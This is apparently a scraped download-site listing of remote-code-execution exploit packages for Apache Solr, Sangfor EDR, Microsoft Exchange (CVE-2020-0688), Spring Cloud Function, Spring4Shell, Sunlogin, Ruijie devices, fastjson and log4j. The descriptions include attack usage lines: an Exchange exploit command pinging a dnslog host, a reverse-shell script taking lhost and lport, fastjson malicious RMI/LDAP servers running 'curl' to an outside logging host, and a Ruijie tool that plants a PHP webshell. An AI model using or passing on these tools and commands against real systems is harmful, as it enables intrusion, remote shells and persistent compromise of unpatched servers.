CVE-2019-0193 Apache-Solr via Velocity template RCE
2022-04-13 18:00:11 1KB apache solr lucene
1
# Sangfor EDR RCE 影响版本: - EDR v3.2.16 - EDR v3.2.17 - EDR v3.2.19 exp: ``` python poc.py url http://10.10.10.0/ ```
2022-04-06 00:16:08 3KB 安全漏洞 RCE
# CVE-2020-0688 Exchange RCE 前提: 已知一个域用户 影响版本: -Microsoft Exchange Server 2010 Service Pack 3 Update Rollup 30 -Microsoft Exchange Server 2013 Cumulative Update 23 -Microsoft Exchange Server 2016 Cumulative Update 15 -Microsoft Exchange Server 2019 Cumulative Update 4 exp1: [@Ridter](https://github.com/Ridter/cve-2020-0688) ``` python cve-2020-0688.py -s https://ip/owa/ -u user -p pass -c "ping test.ph4nxq.dnslog.cn" ``` exp2: [@zcgonvh](https://github.com/zcgonvh/CVE-2020-068
2022-04-06 00:16:06 35KB Exchange 安全漏洞 exp
Spring Cloud Function 是基于Spring Boot 的函数计算框架,它抽象出所有传输细节和基础架构,允许开发人员保留所有熟悉的工具和流程,并专注于业务逻辑。 批量检测脚本:python Spel_RCE_POC.py url.txt 反弹shell脚本:python Spel_RCE_Bash_EXP.py url lhost lport 受影响版本:3.0.0.RELEASE <= Spring Cloud Function <= 3.2.2
2022-04-06 00:15:51 4KB spring cloud spring 后端
1
Spring-Core JDK9+ RCE漏洞复现环境
2022-04-06 00:13:35 3.76MB 漏洞
1
测试自己向日葵是否存在RCE漏洞
2022-04-05 11:32:54 28MB RCE
1
自述文件 瑞杰网络RCE漏洞检测工具,为方便渗透测试使用,可以批量检测,也会生成历史记录。同时也为防止他人恶意使用,可自定义GET参数密码,该密码由sha256加密,难以破解。 免责声明 由于传播,利用此文所提供的信息而造成的任何直接或间接的后果及损失,均由使用者本人负责,作者不承担任何责任。 参数 -f string 导入.txt文件批量扫描 -n string 自定义POST木马密码,默认cmd -p string 自定义GET密码验证,默认为cmd -u string 目标URL 使用 检测到防御后生成随机数.php文件执行命令,也可以上菜刀。 普通使用 GET密码:cmd POST密码:cmd ./RuijieRCE -u http://127.0.0.1:4430 设置密码 -n参数为POST密码,-p参数为GET密码这两
2022-03-29 10:53:06 43KB Go
1
fastjson_rce_tool java -jar fastjson_tool.jar Usage: java -cp fastjson_tool.jar fastjson.HRMIServer 127.0.0.1 80 "curl dnslog.wyzxxz.cn" java -cp fastjson_tool.jar fastjson.HLDAPServer 127.0.0.1 80 "curl dnslog.wyzxxz.cn" java -cp fastjson_tool.jar fastjson.HLDAPServer2 127.0.0.1 80 "whoami" java -cp fastjson_tool.jar fastjson.LDAPRefServerAuto 127.0.0.1 1099 file=filename tamper=tohex java -cp
2022-03-03 11:16:10 20.58MB
1
这是存在log4j jndi注入的项目,可以用idea编译,用网上工具复现一遍
2022-02-23 21:00:06 65KB log4j2
1
Spring Boot漏洞利用检查清单 Spring Boot相关突破学习资料,利用方法和技巧合集,黑盒安全评估清单 声明 :warning:本项目所有内容仅作为安全研究和授权测试使用,相关人员对因误用和滥用该项目造成的一切损害概不负责 目录 零:路由和版本 0x01:路由知识 一些程序员会自定义/manage , /management ,项目App相关名称为spring根路径 Spring启动器的1.x版本默认内置路由的起始路径为/ ,2.X版本则统一以/actuator为起始路径 Spring Boot Actuator默认的内置路由名称,如/env有时候也会被程序员修改, /appenv修改成/appenv 0x02:版本知识 Spring Cloud是基于Spring Boot来进行整合服务,并提供如配置管理,服务注册与发现,智能路由等常见功能的帮助快速开发分布式系统的系列框架的有序集合
2022-01-15 16:52:41 63KB wiki exploits rce springboot
1